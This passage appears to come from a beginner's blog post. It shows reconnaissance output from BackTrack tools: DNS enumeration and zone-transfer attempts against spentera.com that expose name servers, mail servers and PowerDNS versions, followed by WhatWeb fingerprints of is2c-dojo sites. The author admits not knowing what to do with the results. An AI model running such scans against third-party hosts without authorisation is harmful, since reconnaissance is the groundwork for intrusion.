                                                                                                                                                                                               
spentera.com                             1200     IN    A        74.81.66.104                                                                                                                  

                                                                                                                                                                                               
Name Servers:
______________                                                                                                                                                                                 
                                                                                                                                                                                               
dns2.namecheaphosting.com                1200     IN    A        199.204.19.79                                                                                                                 
dns1.namecheaphosting.com                1200     IN    A        74.81.65.92

                                                                                                                                                                                               
Mail (MX) Servers:                                                                                                                                                                             
___________________                                                                                                                                                                            
                                                                                                                                                                                               
aspmx2.googlemail.com                    1016     IN    A        74.125.43.27                                                                                                                  
alt2.aspmx.l.google.com                  293      IN    A        74.125.157.27
aspmx3.googlemail.com                    3355     IN    A        74.125.127.27
aspmx.l.google.com                       171      IN    A        74.125.53.27

                                                                                                                                                                                               
Trying Zone Transfers and getting Bind Versions:                                                                                                                                               
_________________________________________________                                                                                                                                              
                                                                                                                                                                                               
                                                                                                                                                                                               
Trying Zone Transfer for spentera.com on dns2.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns2.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

Trying Zone Transfer for spentera.com on dns1.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns1.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

brute force file not specified, bay. 
When I use the WhatWeb application I get something like this:
http://is2c-dojo.net [301] Country[UNITED STATES][US], Title[301 Moved], UncommonHeaders[x-xss-protection,x-frame-options], RedirectLocation[http://www.is2c-dojo.net/], HTTPServer[ghs], X-XSS-Protection[1; mode=block], IP[216.239.32.21], X-Frame-Options[SAMEORIGIN]                                                                                                                     
URL    : http://is2c-dojo.net
Status : 301
   Country --------------------------------------------------------------------
        Description: GeoIP IP2Country lookup. To refresh DB, replace
                     IpToCountry.csv and remove country-ips.dat. GeoIP database
                     from http://software77.net/geo-ip/. Local IPv4 addresses
                     are represented as ZZ according to an ISO convention.
                     Lookup code developed by Matthias Wachter for rubyquiz.com
                     and used with permission.
        String     : UNITED STATES
        Module     : US

   HTTPServer -----------------------------------------------------------------
        Description: HTTP server header string. This plugin also attempts to
                     identify the operating system from the server header.
        String     : ghs (from server string)

   IP -------------------------------------------------------------------------
        Description: IP address of the target, if available.
        String     : 216.239.32.21

   RedirectLocation -----------------------------------------------------------
        Description: HTTP Server string location. used with http-status 301 and
                     302
        String     : http://www.is2c-dojo.net/ (from location)

   Title ----------------------------------------------------------------------
        Description: The HTML page title
        String     : 301 Moved (from page title)

   UncommonHeaders ------------------------------------------------------------
        Description: Uncommon HTTP server headers. The blacklist includes all
                     the standard headers and many non standard but common ones.
                     Interesting but fairly common headers should have their own
                     plugins, eg. x-powered-by, server and x-aspnet-version.
                     Info about headers can be found at www.http-stats.com
        String     : x-xss-protection,x-frame-options (from headers)

   X-Frame-Options ------------------------------------------------------------
        Description: This plugin retrieves the X-Frame-Options value from the
                     HTTP header. - More Info:
                     http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
                     aspx
                   
        String     : SAMEORIGIN

   X-XSS-Protection -----------------------------------------------------------
        Description: This plugin retrieves the X-XSS-Protection value from the
                     HTTP header. - More Info:
                     http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
                     aspx
                    
        String     : 1; mode=block

http://www.is2c-dojo.net/ ERROR: Timed out execution expired
root@bt:/pentest/enumeration/web/whatweb# ./whatweb -v is2c-dojo.com
http://is2c-dojo.com/ [403]
http://is2c-dojo.com [403] Country[UNITED STATES][US], Title[403 Forbidden], HTTPServer[nginx admin], IP[67.222.154.106]
URL    : http://is2c-dojo.com
Status : 403
   Country --------------------------------------------------------------------
        Description: GeoIP IP2Country lookup. To refresh DB, replace
                     IpToCountry.csv and remove country-ips.dat. GeoIP database
                     from http://software77.net/geo-ip/. Local IPv4 addresses
                     are represented as ZZ according to an ISO convention.
                     Lookup code developed by Matthias Wachter for rubyquiz.com
                     and used with permission.
        String     : UNITED STATES
        Module     : US

   HTTPServer -----------------------------------------------------------------
        Description: HTTP server header string. This plugin also attempts to
                     identify the operating system from the server header.
        String     : nginx admin (from server string)

   IP -------------------------------------------------------------------------
        Description: IP address of the target, if available.
        String     : 67.222.154.106

   Title ----------------------------------------------------------------------
        Description: The HTML page title
        String     : 403 Forbidden (from page title)

root@bt:/pentest/enumeration/web/whatweb# ./whatweb -v spentera.com
http://spentera.com ERROR: Timed out execution expired
Honestly, until now I still do not understand what I can do with this information. And unfortunately the server may be temporarily down. I don't know whether the problem is in my connection or the server is really down. I can't access any of the mr.mada web...